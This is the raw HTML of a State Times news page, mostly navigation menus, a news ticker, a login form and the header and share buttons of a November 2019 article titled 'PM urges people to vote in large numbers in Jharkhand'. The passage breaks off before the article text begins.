href='http://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/' title='PM urges people to vote in large numbers in Jharkhand'><img src='http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg?x39047' alt='PM urges people to vote in large numbers in Jharkhand' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/' title='PM urges people to vote in large numbers in Jharkhand'> PM urges people to vote in large numbers in Jharkhand</a><span> - 1 min ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/' title='Teenage girl sits on solitary protest outside Parliament over crimes against women'><img src='http://news.statetimes.in/wp-content/uploads/2017/11/Parliaments-Winter-Session-to-be-held-from-Dec-15-to-Jan-5.jpg?x39047' alt='Teenage girl sits on solitary protest outside Parliament over crimes against women' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/' title='Teenage girl sits on solitary protest outside Parliament over crimes against women'> Teenage girl sits on solitary protest outside Parliament over crimes against women</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/' title='Pak waging proxy war as it can&#8217;t win conventional one: Rajnath'><img src='http://news.statetimes.in/wp-content/uploads/2018/12/rajnath-singh-1.jpg?x39047' alt='Pak waging proxy war as it can&#8217;t win conventional one: Rajnath' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/' title='Pak waging proxy war as it can&#8217;t win conventional one: Rajnath'> Pak waging proxy war as it can&#8217;t win conventional one: Rajnath</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/' title='Uddhav Thackeray-led govt to face floor test on Saturday'><img src='http://news.statetimes.in/wp-content/uploads/2015/07/Uddhav-Thackeray1.jpg?x39047' alt='Uddhav Thackeray-led govt to face floor test on Saturday' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/' title='Uddhav Thackeray-led govt to face floor test on Saturday'> Uddhav Thackeray-led govt to face floor test on Saturday</a><span> - 2 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/karan-zoya-dibakar-and-anurags-ghost-stories-to-debut-on-netflix-on-jan-1-2020/' title='Karan, Zoya, Dibakar and Anurag&#8217;s &#8216;Ghost Stories&#8217; to debut on Netflix on Jan 1, 2020'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/Ghost-Stories.jpg?x39047' alt='Karan, Zoya, Dibakar and Anurag&#8217;s &#8216;Ghost Stories&#8217; to debut on Netflix on Jan 1, 2020' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/karan-zoya-dibakar-and-anurags-ghost-stories-to-debut-on-netflix-on-jan-1-2020/' title='Karan, Zoya, Dibakar and Anurag&#8217;s &#8216;Ghost Stories&#8217; to debut on Netflix on Jan 1, 2020'> Karan, Zoya, Dibakar and Anurag&#8217;s &#8216;Ghost Stories&#8217; to debut on Netflix on Jan 1, 2020</a><span>  2 days ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/priyadarshan-akshay-kumar-to-reunite-for-comedy/' title='Priyadarshan-Akshay Kumar to reunite for comedy'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/Priyadarshan-Akshay-Kumar-to-reunite-for-comedy.jpg?x39047' alt='Priyadarshan-Akshay Kumar to reunite for comedy' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/priyadarshan-akshay-kumar-to-reunite-for-comedy/' title='Priyadarshan-Akshay Kumar to reunite for comedy'> Priyadarshan-Akshay Kumar to reunite for comedy</a><span>  5 days ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/rajkummar-rao-such-a-giving-co-actor-fatima/' title='Rajkummar Rao such a giving co-actor: Fatima'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/Rajkummar-Rao-such-a-giving-co-actor-Fatima.jpg?x39047' alt='Rajkummar Rao such a giving co-actor: Fatima' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/rajkummar-rao-such-a-giving-co-actor-fatima/' title='Rajkummar Rao such a giving co-actor: Fatima'> Rajkummar Rao such a giving co-actor: Fatima</a><span>  1 week ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/">PM urges people to vote in large numbers in Jharkhand</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cricket-association-for-blind-jammu-kashmir-will-organised-inter-state-cricket-series-for-the-blind-on-2nd-3rd-december-2019-at-university-of-jammu/">Cricket Association for Blind Jammu &#038; Kashmir will organised Inter State Cricket Series for the Blind on 2nd &#038;  3rd December 2019 at University of Jammu</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/teenage-girl-sits-on-solitary-protest-outside-parliament-over-crimes-against-women/">Teenage girl sits on solitary protest outside Parliament over crimes against women</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/tens-of-thousands-rally-in-europe-asia-before-un-climate-summit/">Tens of thousands rally in Europe, Asia before UN climate summit</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/pak-waging-proxy-war-as-it-cant-win-conventional-one-rajnath/">Pak waging proxy war as it can&#8217;t win conventional one: Rajnath</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/uddhav-thackeray-led-govt-to-face-floor-test-on-saturday/">Uddhav Thackeray-led govt to face floor test on Saturday</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/woman-vet-raped-before-being-killed-4-lorry-workers-arrested/">Woman vet raped before being killed: 4 lorry workers arrested</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/green-jk-drive-reaches-skims-medical-college/">&#8216;Green J&#038;K&#8217; drive reaches SKIMS Medical College</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/kotwal-reviews-functioning-of-revenue-deptt-progress-on-dilrmp/">Kotwal reviews functioning of Revenue Deptt, progress on DILRMP</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/cake-mixing-ceremony-held-at-asia-hotel/">Cake mixing ceremony held at Asia Hotel</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/sarpanchs-panchs-exposed-hollow-claims-of-development-cong/">Sarpanchs, Panchs exposed hollow claims of development: Cong</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/rana-invokes-societal-role-in-empowerment-of-differently-abled/">Rana invokes societal role in empowerment of differently-abled</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/lllsi-hails-amicable-solution-of-maharashtra-crisis/">LLLSI hails amicable solution of Maharashtra crisis</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/ju-students-visit-old-age-home/">JU students visit Old Age Home</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/citizens-forum-seeks-financial-assistance-for-msmes/">Citizens’ Forum seeks financial assistance for MSMEs</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/india-national/" title="India"><span itemprop="title">India</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">PM urges people to vote in large numbers in Jharkhand</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-554515 post type-post status-publish format-standard category-india-national category-imp-today"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2019-11-30T12:16:34+00:00"/>
  <meta itemprop="dateModified" content="2019-11-30T12:16:42+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">PM urges people to vote in large numbers in Jharkhand</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2019-11-30T12:16:34+00:00" class="updated">November 30, 2019</time></span><span>In: <a href="http://news.statetimes.in/section/news/india-national/" title="View all posts in India">India</a>, <a href="http://news.statetimes.in/section/news/imp-today/" title="View all posts in Latest News">Latest News</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=PM urges people to vote in large numbers in Jharkhand&body=PM urges people to vote in large numbers in Jharkhand http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="554515">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=PM urges people to vote in large numbers in Jharkhand&url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/&title=PM urges people to vote in large numbers in Jharkhand&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg&amp;
url=http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/&amp;
is_video=false&amp;description=PM urges people to vote in large numbers in Jharkhand"
